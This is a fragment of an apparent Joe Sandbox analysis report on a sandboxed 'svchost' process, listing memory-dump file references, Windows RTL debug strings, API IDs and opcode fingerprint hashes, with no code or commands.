                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 035A02BD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                • Opcode ID: b0890b55a09e2c356123280ed92e4ca247d1c7635efe9bc57475c95ce100cd51
                                                                                                                                • Instruction ID: 996607c9cf1c8a8b0cc1f366992d9890f20b06b7fcc29fc1ad8f5f6498e55843
                                                                                                                                • Opcode Fuzzy Hash: b0890b55a09e2c356123280ed92e4ca247d1c7635efe9bc57475c95ce100cd51
                                                                                                                                • Instruction Fuzzy Hash: D3E1AD30614B41DFD724CF28E894B2AB7E4BF84314F184A5AF9A58B2F1D774E945CB82
                                                                                                                                Strings
                                                                                                                                • RTL: Resource at %p, xrefs: 035A7B8E
                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 035A7B7F
                                                                                                                                • RTL: Re-Waiting, xrefs: 035A7BAC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 0-871070163
                                                                                                                                • Opcode ID: 484851e7f91c7dc8d224f22419ed96e60e4cfd72355c38c448f354eb5474ffaf
                                                                                                                                • Instruction ID: 4ffa901796abf4111ed1101830993b978eb88aa0bd9ea1ffcac85e63781c905d
                                                                                                                                • Opcode Fuzzy Hash: 484851e7f91c7dc8d224f22419ed96e60e4cfd72355c38c448f354eb5474ffaf
                                                                                                                                • Instruction Fuzzy Hash: 1541E4353007069FD724DE69EC40B6AF7E9FF88710F140A2DE956DB6A0EB71E8058B91
                                                                                                                                APIs
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 035A728C
                                                                                                                                Strings
                                                                                                                                • RTL: Resource at %p, xrefs: 035A72A3
                                                                                                                                • RTL: Re-Waiting, xrefs: 035A72C1
                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 035A7294
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-
                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$@
                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                APIs
                                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 035BCFBD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallFilterFunc@8
                                                                                                                                • String ID: @$@4Cw@4Cw
                                                                                                                                • API String ID: 4062629308-3101775584